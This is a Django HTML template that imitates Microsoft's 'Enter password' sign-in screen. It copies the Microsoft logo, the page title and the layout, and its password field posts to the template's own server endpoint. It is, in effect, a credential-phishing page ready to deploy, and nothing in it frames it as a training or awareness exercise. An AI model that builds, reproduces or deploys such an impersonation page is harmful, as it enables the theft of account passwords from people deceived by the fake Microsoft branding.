{%load static%}
<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Microsoft</title>
    <link rel="stylesheet" href="style.css">
<body>
    <div style="margin: 16px; width: 100wv;">
        <div>
            <span style="display: flex; justify-content: flex-start; margin: auto;">
                 <svg xmlns="http://www.w3.org/2000/svg"  viewBox="0 0 48 48" width="48px" height="48px"><path fill="#ff5722" d="M6 6H22V22H6z" transform="rotate(-180 14 14)"/><path fill="#4caf50" d="M26 6H42V22H26z" transform="rotate(-180 34 14)"/><path fill="#ffc107" d="M26 26H42V42H26z" transform="rotate(-180 34 34)"/><path fill="#03a9f4" d="M6 26H22V42H6z" transform="rotate(-180 14 34)"/></svg> <p>Microsoft</p>
            </span>
            <div>
                <h1>Enter password</h1>
                <form action="" method="post">
                    {% csrf_token %}
                <div style="border-bottom: 4px; border-color: rgb(10, 78, 167);">
                    <input style="border: none;" type="password" size="30" placeholder="Password" name="password">
                    <hr style="color: black; width: 300px; color: rgb(10, 78, 167); margin-right: 100%;">
                </div>
            
                <!-- <div><p>No account? <span style="color: rgb(10, 78, 167);">Create one!</span></p></div> -->
            </div>
            <div><p style="color: rgb(10, 78, 167);">Forgotten your password?</p></div>
            <div style="display: flex; justify-content: flex-end; padding-top: 54px;">
                <span>
                    <!-- <button type="button" style="padding-left: 56px; padding-right: 56px; padding-top: 8px; padding-bottom: 8px; border-radius: 4px; border: none; background-color: lightgrey;">Back</button> -->
                    <!-- <button type="button" value="password" style="background-color: blue;color: white; padding-left: 56px; padding-right: 56px; padding-top: 8px; padding-bottom: 8px; border-radius: 4px; border: none;">Sign in</button> -->
                    <input type="submit" value="Sign in" style="background-color: blue;color: white; padding-left: 56px; padding-right: 56px; padding-top: 8px; padding-bottom: 8px; border-radius: 4px; border: none;"></input>
                </span>
            </div>
        </div>
    </form>
        <!-- <div style="border: 1px solid grey; margin-top: 40px; padding-left: 12px; width: 400px; height: 40px; text-align: center; display: flex; justify-content: flex-start;">
            <span style="display: flex; justify-content: flex-start; align-items: center;">
                <p><img style="margin-top: 2px;" src="./media/key.png" alt="key" width="20px" height="20px"></p><P style="padding-left: 32px;">Sign-in options</P>
            </span>
        </div> -->
        <div style="display: flex; justify-content: flex-start; align-items: center; position: fixed; bottom: 0; width: 100vw;">
            <div style="display: flex; justify-content: flex-start;">
                <small>Terms of use</small>
                <small style="padding-left: 20px;">Privacy & cookies</small>
            </div>
            <div style="display: flex; justify-content: space-between; align-items: center; width: 50px; padding-left: 32px;">
                <span id="cir"></span>
                <span id="cir"></span>
                <span id="cir"></span>
            </div>
        </div>
    </div>
</body>
</html>